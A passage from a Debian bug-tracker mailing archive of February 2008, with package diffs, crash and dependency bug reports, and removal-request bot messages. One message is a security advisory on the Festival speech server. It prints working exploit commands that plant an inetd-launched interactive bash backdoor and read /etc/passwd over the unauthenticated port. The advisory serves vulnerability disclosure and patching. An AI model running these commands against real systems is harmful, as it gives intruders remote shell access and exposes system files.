+* Dropped patch to script/fixghc (applied upstream).
+* Dropped patch to src/interpreter/Makefile (applied upstream).
+* src/interpreter/SimpleLineEditor.hs (applied upstream).
+  * scripts/confhc:
+* Filter out LINE pragma when determining the version number of
+  GHC. (Closes: #427311)
+  * src/hmake/{Config.hs,PackageConfig.hs}:
+* Update the program to search for the imports in another directory
+  if the GHC version >= 6.8 as of that version they are shipped in
+  $ghclibdir/lib/$package instead of $ghclibdir/imports 
+  (Closes: #459737) 
+  
+ -- Arjan Oosting <[EMAIL PROTECTED]>  Sat, 16 Feb 2008 23:02:48 +0100
+
 hmake (3.12-1) unstable; urgency=low
 
   * New upstream version:
diff -Nru /tmp/rYlbx7Ovhj/hmake-3.12/docs/hmake/changes.html /tmp/9JeFm9DgiE/hmake-3.13/docs/hmake/changes.html
--- hmake-3.12/docs/hmake/changes.html	2006-09-12 16:00:43.0 +0200
+++ hmake-3.13/docs/hmake/changes.html	2006-11-01 18:10:12.0 +0100
@@ -9,6 +9,15 @@
 
 
 
+
+
+3.13
+  
+	
+	 No, really fix hmake to build with ghc-6.6.
+	
+
+
 
 3.12
   
@@ -371,7 +380,7 @@
 http://www.cs.york.ac.uk/fp/hmake/
 
 
-Information last updated: 12th Sept 2006
+Information last updated: 1st Nov 2006
 http://www.cs.york.ac.uk/fp/";>
 York Functional Programming Group
 [EMAIL PROTECTED]
diff -Nru /tmp/rYlbx7Ovhj/hmake-3.12/docs/hmake/index.html /tmp/9JeFm9DgiE/hmake-3.13/docs/hmake/index.html
--- hmake-3.12/docs/hmake/index.html	2006-09-12 16:02:42.0 +0200
+++ hmake-3.13/docs/hmake/index.html	2006-11-01 18:11:51.0 +0100
@@ -48,21 +48,17 @@
 Recent News
 
 
-The current version is hmake-3.12 (date 2006-09-12).
+The current version is hmake-3.13 (date 2006-11-01).
 
- New feature: hmake -M dependency analysis now adds
- "# -cpp" if cpp is required.
- Fix to enable hmake to build with ghc-6.6.
+ No, really fix hmake to build with ghc-6.6.
 
 
 
-The previous version was hmake-3.11 (date 2006-05-03).
+The previous version was hmake-3.12 (date 2006-09-12).
 
- New: the #! runhs script interpreter.
- Bugfix: now finds dependency B in
- module A where { import B; ... }
- Bugfixes: for compatibility problems with gcc-4.0. 
- Re-organised the internal cpphs library.
+ New feature: hmake -M dependency analysis now adds
+ "# -cpp" if cpp is required.
+ Fix to enable hmake to build with ghc-6.6.
 
 
 
@@ -207,7 +203,7 @@
 http://www.cs.york.ac.uk/fp/hmake/ (mirror)
 
 
-Information last updated: 12th Sept 2006
+Information last updated: 1st Nov 2006
 http://www.cs.york.ac.uk/fp/";>
 York Functional Programming Group
 [EMAIL PROTECTED]
diff -Nru /tmp/rYlbx7Ovhj/hmake-3.12/Makefile.inc /tmp/9JeFm9DgiE/hmake-3.13/Makefile.inc
--- hmake-3.12/Makefile.inc	2006-09-12 15:56:22.0 +0200
+++ hmake-3.13/Makefile.inc	2006-11-01 18:07:56.0 +0100
@@ -14,7 +14,7 @@
 # corresponding version in the configure script!
 #   (odd minor number = CVS version;  even minor number = release version)
 
-HMAKEVERSION = 3.12
+HMAKEVERSION = 3.1

Bug#464413: marked as done (python-migrate: migrate doesn't work with sqlalchemy in testing and unstable)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 23:17:05 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#464413: fixed in migrate 0.4.1-1
has caused the Debian Bug report #464413,
regarding python-migrate: migrate doesn't work with sqlalchemy in testing and 
unstable
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
464413: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464413
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: python-migrate
Version: 0.2.2-2
Severity: grave
Justification: renders package unusable

The migrate version 0.2.2 stopped working at the release of sqlalchemy
0.3.10. There is some ongoing effort to make it work again. Support for
sqlalchemy >= 0.3.10 and <0.4 is restored at the new project page

http://code.google.com/p/sqlalchemy-migrate/

work on 0.4 support is not finished.

If lenny should include python-migrate the 0.3 release could be
packaged to support python-sqlalchemy 0.3.10 (currently in lenny). If
there is a clear indication that sqlalchemy 0.4 will be included in
lenny there is more upstream work required.

Since I'm a maintainer of the upstream project too, I'll try to fix the
remaining issues. If anybody has the time to work on the issues, you're
welcome to join the upstream project.

I'll package a new release as soon as I've some free time.

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (990, 'testing'), (500, 'unstable'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-3-vserver-686 (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages python-migrate depends on:
ii  python2.4.4-6An interactive high-level object-o
ii  python-central0.5.15-0.1 register and build utility for Pyt
ii  python-sqlalchemy 0.3.10-1   SQL toolkit and Object Relational 

python-migrate recommends no packages.

-- no debconf information


--- End Message ---
--- Begin Message ---
Source: migrate
Source-Version: 0.4.1-1

We believe that the bug you reported is fixed in the latest version of
migrate, which is due to be installed in the Debian FTP archive:

migrate_0.4.1-1.diff.gz
  to pool/main/m/migrate/migrate_0.4.1-1.diff.gz
migrate_0.4.1-1.dsc
  to pool/main/m/migrate/migrate_0.4.1-1.dsc
migrate_0.4.1.orig.tar.gz
  to pool/main/m/migrate/migrate_0.4.1.orig.tar.gz
python-migrate_0.4.1-1_all.deb
  to pool/main/m/migrate/python-migrate_0.4.1-1_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Jan Dittberner <[EMAIL PROTECTED]> (supplier of updated migrate package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Sat, 16 Feb 2008 12:38:56 +0100
Source: migrate
Binary: python-migrate
Architecture: source all
Version: 0.4.1-1
Distribution: unstable
Urgency: medium
Maintainer: Jan Dittberner <[EMAIL PROTECTED]>
Changed-By: Jan Dittberner <[EMAIL PROTECTED]>
Description: 
 python-migrate - Database schema migration for SQLAlchemy
Closes: 464413
Changes: 
 migrate (0.4.1-1) unstable; urgency=medium
 .
   * New upstream release (Closes: #464413)
   * incorporate upstream copyright changes
   * add Homepage, Vcs-Browser and Vcs-Svn fields to debian/control
   * don't depend on fixed revision numbers
   * update policy version to 3.7.3
   * depend on python-sqlalchemy (>= 0.3.10)
   * add Debian Python Modules Team to Uploaders
   * use default Python version in /usr/bin/migrate's hashbang
   * add python-setuptools to Depends
Files: 
 ca21c0c1bc81f416fd004729c6c2db34 1014 python optional migrate_0.4.1-1.dsc
 d259ef6c71d72343800684d3ab693bf5 62263 python optional 
migrate_0.4.1.orig.tar.gz
 ed9e689592a18706084e0afc15d89d67 3048 python optional migrate_0.4.1-1.diff.gz
 91a9a7918599698cde301e9679eb5f52 16732 python optional 
python-migrate_0.4.1-1_all.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHt2yiB01zfu119ZkRAkFnAJ9Fpzl7L8dUKEWaF5Xo/2r3ZZDOyACgmf/+
PubUZwhUVHrAzpSzFf8d1qM=
=yuEy
-END PGP SIGNATURE-


--- End Message ---


Bug#462678:

2008-02-16 Thread Kamaraju Kusumanchi
> 2) the "ghostscript Provides gs" is wrong because ghostscript does not
>   provide the full functionality of gs: it is missing the x11 output
>   device support

...

> However 2) is something that should be fixed in the new ghostscript
> packages. IMO ghostscript-x should be providing gs, gs-esp and gs-gpl, and
> not ghostscript. If that had been the case, I would not have been allowed
> to remove ghostscript-x.

I like this idea myself. But would like to hear from the maintainers.

Also, Is it fine if a package depends/recommends/suggests the gs
package? or should the maintainers remove the dependency on gs package
completely and explicitly depend upon ghostscript or ghostscript-x?

thanks
raju



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#466052: GRUB installation failed

2008-02-16 Thread Patrick Hütter
The same problem on my Samsung R70 Despina Notebook.
I  hope you will fix that soon. Thanks and greetings from Germany!
whitenexx alias Patrick Hütter


Bug#449173: can the severity of this bug be downgraded?

2008-02-16 Thread Kamaraju Kusumanchi
Currently packages like texmacs are blocked from entering into testing
branch because they depend upon ghostscript and ghostscript has not
entered into testing. So I was looking at the RC bugs of ghostscript
to see if any of them can be solved.

I am wondering if this bug can be downgraded from severity grave to
normal (or even be closed if possible)? The bug was marked
unreproducible, and the OP reported that the problem went away by
installing the latest version.

As for

$ rmadison ghostscript
ghostscript | 8.61.dfsg.1-1 |  unstable | source, alpha, amd64,
arm, armel, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390, sparc


I see that ghostscript has the same versions on all architectures. So
people upgrading from previous versions should not have any problem.

thanks
raju



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#466153: marked as done (ktorrent: Crashes when attempting to start or delete a torrent)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 23:41:50 +0200
with message-id <[EMAIL PROTECTED]>
and subject line Re: [Pkg-kde-extras] Bug#466153: ktorrent: Crashes when 
attempting to start or delete a torrent
has caused the Debian Bug report #466153,
regarding ktorrent: Crashes when attempting to start or delete a torrent
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
466153: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=466153
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: ktorrent
Version: 2.2.5.dfsg.1-1
Severity: grave
Justification: renders package unusable

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Add any torrent to ktorrent and start downloading. The application will 
immediately crash. If you restart ktorrent it will crah whwnever you either try 
to delete or to 
start the torrent.

- -- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (200, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.24-1-686 (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages ktorrent depends on:
ii  kdelibs4c2a 4:3.5.8.dfsg.1-7 core libraries and binaries for al
ii  libavahi-client30.6.22-2 Avahi client library
ii  libavahi-common30.6.22-2 Avahi common library
ii  libavahi-qt3-1  0.6.22-2 Avahi Qt 3 integration library
ii  libc6   2.7-8GNU C Library: Shared libraries
ii  libgcc1 1:4.3-20080202-1 GCC support library
ii  libgeoip1   1.4.4.dfsg-1 A non-DNS IP-to-country resolver l
ii  libgmp3c2   2:4.2.2+dfsg-2   Multiprecision arithmetic library
ii  libqt3-mt   3:3.3.8b-1   Qt GUI Library (Threaded runtime v
ii  libstdc++6  4.3-20080202-1   The GNU Standard C++ Library v3

Versions of packages ktorrent recommends:
ii  kdebase-data4:3.5.8.dfsg.1-7 shared data files for the KDE base
ii  kdebase-kio-plugins 4:3.5.8.dfsg.1-7 core I/O slaves for KDE

- -- no debconf information

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHt1Rsx4r6EkTlIb0RApBRAJ9P6BLiKq0tE8s+e3eDzIWMJgXjsgCgo/P4
YoCEm88mUbulHhnE7NoAvNU=
=vzdf
-END PGP SIGNATURE-


--- End Message ---
--- Begin Message ---
Hi,

2008 m. February 16 d., Saturday, Erik Hahn rašė:
> Add any torrent to ktorrent and start downloading. The application will
> immediately crash. If you restart ktorrent it will crah whwnever you either
> try to delete or to start the torrent.
Fixed by libqt3-mt 3.3.8-2 upload. Upgrade in a few hours (if your mirror 
syncs fast).


-- 
Modestas Vainius <[EMAIL PROTECTED]>


signature.asc
Description: This is a digitally signed message part.
--- End Message ---


Bug#466153: ktorrent: Crashes when attempting to start or delete a torrent

2008-02-16 Thread Erik Hahn
Package: ktorrent
Version: 2.2.5.dfsg.1-1
Severity: grave
Justification: renders package unusable

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Add any torrent to ktorrent and start downloading. The application will 
immediately crash. If you restart ktorrent it will crah whwnever you either try 
to delete or to 
start the torrent.

- -- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (200, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.24-1-686 (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages ktorrent depends on:
ii  kdelibs4c2a 4:3.5.8.dfsg.1-7 core libraries and binaries for al
ii  libavahi-client30.6.22-2 Avahi client library
ii  libavahi-common30.6.22-2 Avahi common library
ii  libavahi-qt3-1  0.6.22-2 Avahi Qt 3 integration library
ii  libc6   2.7-8GNU C Library: Shared libraries
ii  libgcc1 1:4.3-20080202-1 GCC support library
ii  libgeoip1   1.4.4.dfsg-1 A non-DNS IP-to-country resolver l
ii  libgmp3c2   2:4.2.2+dfsg-2   Multiprecision arithmetic library
ii  libqt3-mt   3:3.3.8b-1   Qt GUI Library (Threaded runtime v
ii  libstdc++6  4.3-20080202-1   The GNU Standard C++ Library v3

Versions of packages ktorrent recommends:
ii  kdebase-data4:3.5.8.dfsg.1-7 shared data files for the KDE base
ii  kdebase-kio-plugins 4:3.5.8.dfsg.1-7 core I/O slaves for KDE

- -- no debconf information

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHt1Rsx4r6EkTlIb0RApBRAJ9P6BLiKq0tE8s+e3eDzIWMJgXjsgCgo/P4
YoCEm88mUbulHhnE7NoAvNU=
=vzdf
-END PGP SIGNATURE-



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465095: mailscanner fails to start with FIELD_NAME not imported

2008-02-16 Thread Simon Walter

Hi Tom,

thanks for this info.

>From mailscanner Changelog 4.66.5:
Updated to handle new MailTools 2.02. This includes the use of several new
  Perl modules, so you'll have to use the install.sh to install all the
  requirements of the new MailTools code (unless you are doing clever things
  with yum repositories).

So updating the package to a version > 4.66 would probably fix this
problem.

Problem is, I'm only Maintainer no DD and currently I don't have a
sponsor at hand. I had two offers but no reply yet.

I will try to build a debian package from the newest upstream version
some day next week and upload it to mentors.

-- 
Regards
Simon Walter

Tom Faska <[EMAIL PROTECTED]> writes:

> I have experienced this problem and found that it is caused by
> upgrading libmailtools-perl from version 1.77-1 to 2.02-1.  The
> problem is fixed when downgrading the libmailtools-perl back to
> version 1.77-1.  This is reproducible as seen from the terminal
> capture below.
>
> Apparently there is some incompatibility between Mailscanner 4.58.9-2 
> and libmailtools-perl version 2.02-1.
>
> I hope this helps.
>
> Tom
>
> --
>
> Mailscanner version installed
>monitor:~# dpkg -l mailscanner
>Desired=Unknown/Install/Remove/Purge/Hold
>|
> Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
>|/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err:
> uppercase=bad)
>||/ Name   VersionDescription
>
> +++-==-==-
>ii  mailscanner4.58.9-2   email virus scanner and spam tagger
>
>
> Stop and restart Mailscanner with no errors on start
>monitor:~# /etc/init.d/mailscanner stop
>Program MailScanner, 1 process(es), refused to die.
>monitor:~# /etc/init.d/mailscanner stop
>monitor:~# /etc/init.d/mailscanner start
>
> Upgrade libmailtools-perl from version 1.77-1 to 2.02-1
>monitor:~# apt-get -u upgrade
>Reading package lists... Done
>Building dependency tree... Done
>The following packages will be upgraded:
>  libmailtools-perl
>1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
>Need to get 0B/96.6kB of archives.
>After unpacking 28.7kB disk space will be freed.
>Do you want to continue [Y/n]?
>(Reading database ... 38857 files and directories currently installed.)
>Preparing to replace libmailtools-perl 1.77-1 (using
> .../libmailtools-perl_2.02-1_all.deb) ...
>Unpacking replacement libmailtools-perl ...
>Setting up libmailtools-perl (2.02-1) ...
>
> Now stop and restart Mailscanner with the error
>monitor:~# /etc/init.d/mailscanner stop
>Program MailScanner, 1 process(es), refused to die.
>monitor:~# /etc/init.d/mailscanner stop
>monitor:~# /etc/init.d/mailscanner start
>Variable "$FIELD_NAME" is not imported at
> /usr/share/MailScanner/MailScanner/Message.pm line 6367.
>Variable "$FIELD_NAME" is not imported at
> /usr/share/MailScanner/MailScanner/Message.pm line 6370.
>Global symbol "$FIELD_NAME" requires explicit package name at
>/usr/share/MailScanner/MailScanner/Message.pm line 6367.
>Global symbol "$FIELD_NAME" requires explicit package name at
>/usr/share/MailScanner/MailScanner/Message.pm line 6370.
>Compilation failed in require at /usr/sbin/MailScanner line 79.
>BEGIN failed--compilation aborted at /usr/sbin/MailScanner line 79.
>
> Mailscanner failed to start
>monitor:~# /etc/init.d/mailscanner stop
>No MailScanner found running; none killed.
>
> Downgrade libmailtools-perl back to version 1.77
>monitor:~# dpkg --force-downgrade -i 
> /var/cache/apt/archives/libmailtools-perl_1.77-1_all.deb
>dpkg - warning: downgrading libmailtools-perl from 2.02-1 to 1.77-1.
>(Reading database ... 38855 files and directories currently installed.)
>Preparing to replace libmailtools-perl 2.02-1 (using
> .../libmailtools-perl_1.77-1_all.deb) ...
>Unpacking replacement libmailtools-perl ...
>Setting up libmailtools-perl (1.77-1) ...
>
> Now no errors on start
>monitor:~# /etc/init.d/mailscanner start
>
> Mailscanner processes are running
>monitor:~# ps aux | grep Mail
>postfix  24102  0.0  0.9  25160 19468 ?SNs  09:49   0:00
> MailScanner: master waiting for
>children, sleeping
>postfix  24103  1.8  3.8 101732 80140 ?SN   09:49   0:08
> MailScanner: waiting for messages
>postfix  24110  1.8  3.8 101732 80132 ?SN   09:49   0:08
> MailScanner: waiting for messages
>postfix  24113  1.9  3.8 102312 80848 ?SN   09:50   0:09
> MailScanner: waiting for messages
>postfix  24116  1.9  3.8 101728 80124 ?SN   09:50   0:08
> MailScanner: waiting for messages
>monitor:~#
>
>
>
>



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: tagging 156532

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.13
> tags 156532 + moreinfo
Bug#156532: O: swedish -- The Swedish dictionary for ispell.
There were no tags set.
Tags added: moreinfo

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-16 Thread Tim Brown
Package: festival
Version: 1.96~beta-5
Severity: critical
Tags: security
Justification: root security hole

Nth Dimension Security Advisory (NDSA20080215)
Date: 15th February 2008
Author: Tim Brown 
URL:  / 
Product: Festival 1.96:beta July 2004 

Vendor: Centre for Speech Technology Research, University of Edinburgh 

Risk: Medium

Summary

The Festival server is vulnerable to unauthenticated remote code execution.

Further research indicates that this vulnerability has already been reported
as a local privilege escalation against both the Gentoo and SuSE GNU/Linux 
distributions.  The remote form of this vulnerability was identified in
1.96~beta-5 as distributed in Debian unstable.

Technical Details

The Festival server which can be started using festival --server is vulnerable
to unauthenticated remote command execution due to the inclusion of a scheme
interpreter.  It is possible to make use of standard scheme functions in order
to execute further code, like so:

$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(system "echo ' stream tcp nowait festival /bin/bash /bin/bash -i' >
/tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf")

Connection closed by foreign host.

Whilst this is the most trivial way that the vulnerability can be exploited
the inclusion of a scheme interpreter available without authentication allows
for other vectors of attack.  Scheme functions such as SayText and tts (which
reads a file on the vulnerable system) pose particular interest, for example:

$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(tts "/etc/passwd" nil)

Whilst it is acknowledged that the inclusion of the scheme interpreter in this
manner is entirely intentional, the default unsecure state of the server could
be exploited particularly where the user is unaware of the servers existance.

Solutions

In order to completely protect against the vulnerability (in the short term),
Nth Dimension recommend turning off the server or filtering connections to the
affected port using a host based firewall.  The server itself can be secured by
applying the patches located at http://bugs.gentoo.org/show_bug.cgi?id=170477.
This includes applying a default configuration which limits access to localhost
and setting an optional password which prevents unauthenticated access.

-- System Information:
Debian Release: lenny/sid
  APT prefers oldstable
  APT policy: (500, 'oldstable'), (500, 'unstable'), (500, 'testing'), (500, 
'stable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-3-686 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages festival depends on:
ii  adduser 3.105add and remove users and groups
ii  libaudiofile0   0.2.6-7  Open-source version of SGI's audio
ii  libc6   2.7-8GNU C Library: Shared libraries
ii  libesd0 0.2.36-3 Enlightened Sound Daemon - Shared 
ii  libestools1.2   1:1.2.96~beta-2  Edinburgh Speech Tools Library
ii  libgcc1 1:4.3-20080202-1 GCC support library
ii  libncurses5 5.6+20080203-1   Shared libraries for terminal hand
ii  libstdc++6  4.3-20080202-1   The GNU Standard C++ Library v3
ii  lsb-base3.1-24   Linux Standard Base 3.1 init scrip
ii  sgml-base   1.26 SGML infrastructure and SGML catal
ii  sysv-rc 2.86.ds1-53  System-V-like runlevel change mech

Versions of packages festival recommends:
ii  festvox-kallpc16k [festival-v 1.4.0-5American English male speaker for 

-- no debconf information



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: severity of 462178 is normal, retitle 462178 to RM: ipxripd -- RoQA; obsolete, few users ...

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.16
> severity 462178 normal
Bug#462178: O: ipxripd -- IPX RIP/SAP daemon
Severity set to `normal' from `serious'

> retitle 462178 RM: ipxripd -- RoQA; obsolete, few users
Bug#462178: O: ipxripd -- IPX RIP/SAP daemon
Changed Bug title to `RM: ipxripd -- RoQA; obsolete, few users' from `O: 
ipxripd -- IPX RIP/SAP daemon'.

> reassign 462178 ftp.debian.org
Bug#462178: RM: ipxripd -- RoQA; obsolete, few users
Bug reassigned from package `wnpp' to `ftp.debian.org'.

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: severity of 280028 is normal, retitle 280028 to RM: reppu -- RoQA; orphaned for years, few users ...

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.16
> severity 280028 normal
Bug#280028: O: reppu -- A network render program for blender
Severity set to `normal' from `serious'

> retitle 280028 RM: reppu -- RoQA; orphaned for years, few users
Bug#280028: O: reppu -- A network render program for blender
Changed Bug title to `RM: reppu -- RoQA; orphaned for years, few users' from 
`O: reppu -- A network render program for blender'.

> reassign 280028 ftp.debian.org
Bug#280028: RM: reppu -- RoQA; orphaned for years, few users
Bug reassigned from package `wnpp' to `ftp.debian.org'.

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465531: icedove: Segmentation fault on EXIT after latest security update

2008-02-16 Thread Ralph Katz
Package: icedove
Version: 1.5.0.13+1.5.0.15b.dfsg1-0etch1
Followup-For: Bug #465531



Hi Alex -- Icedove segfaults most of the time on Control-Q exit after the last
security upgrade.  Icedove was closed during the upgrade.

You'll recall that I'm not a programmer so I don't
know if this matters or if it causes any problems I have yet to see.

I always launch icedove from a start-up script, so I see the error
messages in the xterm window like this:

 ~$ 2008-02-14 22:17:49.865 enigmail.js: Enigmail.mimeInitialized: false
 2008-02-14 22:19:57.896 enigmail.js: Enigmail.observe:
 topic='xpcom-shutdown' 
 2008-02-14 22:19:57.944 enigmail.js: Enigmail.observe: changed
 preferences saved
 2008-02-14 22:19:57.947 enigmail.js: Enigmail.finalize:
 /usr/lib/icedove/run-mozilla.sh: line 131:  3055 Segmentation fault
 "$prog" ${1+"$@"}

 The enigmail messages are "normal," see my 4 yr old bug report 246736.

 Icedove has otherwise performed normally since the upgrade.  If I
 launch it, then close it, there is no segfault.  If I use it all day,
 then it seems to segfault regularly on Exit.  

 Perhaps this info will be useful.

 Regards,
 Ralph


-- System Information:
Debian Release: 4.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-6-686
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)

Versions of packages icedove depends on:
ii  debconf [debconf-2.0]  1.5.11etch1   Debian configuration management sy
ii  libatk1.0-01.12.4-3  The ATK accessibility toolkit
ii  libc6  2.3.6.ds1-13etch4 GNU C Library: Shared libraries
ii  libcairo2  1.2.4-4   The Cairo 2D vector graphics libra
ii  libfontconfig1 2.4.2-1.2 generic font configuration library
ii  libgcc11:4.1.1-21GCC support library
ii  libglib2.0-0   2.12.4-2  The GLib library of C routines
ii  libgtk2.0-02.8.20-7  The GTK+ graphical user interface 
ii  libjpeg62  6b-13 The Independent JPEG Group's JPEG 
ii  libpango1.0-0  1.14.8-5  Layout and rendering of internatio
ii  libstdc++6 4.1.1-21  The GNU Standard C++ Library v3
ii  libx11-6   2:1.0.3-7 X11 client-side library
ii  libxcursor11.1.7-4   X cursor management library
ii  libxext6   1:1.0.1-2 X11 miscellaneous extension librar
ii  libxfixes3 1:4.0.1-5 X11 miscellaneous 'fixes' extensio
ii  libxft22.1.8.2-8 FreeType-based font drawing librar
ii  libxi6 1:1.0.1-4 X11 Input extension library
ii  libxinerama1   1:1.0.1-4.1   X11 Xinerama extension library
ii  libxrandr2 2:1.1.0.2-5   X11 RandR extension library
ii  libxrender11:0.9.1-3 X Rendering Extension client libra
ii  libxt6 1:1.0.2-2 X11 toolkit intrinsics library
ii  myspell-en-gb [myspell 1:2.0.4~rc1-3 English_british dictionary for mys
ii  myspell-en-us [myspell 1:2.0.4~rc1-3 English_american dictionary for my
ii  zlib1g 1:1.2.3-13compression library - runtime

icedove recommends no packages.

-- debconf information:
* icedove/browser: Manual



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: severity of 274281 is normal ..., reassign 274281 to ftp.debian.org ...

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.16
> severity 274281 normal
Bug#274281: O: volume.app -- A dockapp enabling easy control of the volume level
Bug#304826: O: volume.app -- A dockapp enabling easy control of the volume level
Severity set to `normal' from `serious'

> retitle 274281 RM: volume.app -- RoQA; orphaned for years, alternatives exist
Bug#274281: O: volume.app -- A dockapp enabling easy control of the volume level
Changed Bug title to `RM: volume.app -- RoQA; orphaned for years, alternatives 
exist' from `O: volume.app -- A dockapp enabling easy control of the volume 
level'.

> reassign 274281 ftp.debian.org
Bug#274281: RM: volume.app -- RoQA; orphaned for years, alternatives exist
Bug#304826: O: volume.app -- A dockapp enabling easy control of the volume level
Bug reassigned from package `wnpp' to `ftp.debian.org'.

> retitle 304826 RM: volume.app -- RoQA; orphaned for years, alternatives exist
Bug#304826: O: volume.app -- A dockapp enabling easy control of the volume level
Changed Bug title to `RM: volume.app -- RoQA; orphaned for years, alternatives 
exist' from `O: volume.app -- A dockapp enabling easy control of the volume 
level'.

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: severity of 268912 is normal, retitle 268912 to RM: x10 -- RoQA; orphaned for years, few users ...

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.16
> severity 268912 normal
Bug#268912: O: x10 -- Operate X-10 electrical power control modules.
Severity set to `normal' from `serious'

> retitle 268912 RM: x10 -- RoQA; orphaned for years, few users
Bug#268912: O: x10 -- Operate X-10 electrical power control modules.
Changed Bug title to `RM: x10 -- RoQA; orphaned for years, few users' from `O: 
x10 -- Operate X-10 electrical power control modules.'.

> reassign 268912 ftp.debian.org
Bug#268912: RM: x10 -- RoQA; orphaned for years, few users
Bug reassigned from package `wnpp' to `ftp.debian.org'.

>
End of message, stopping processing here.

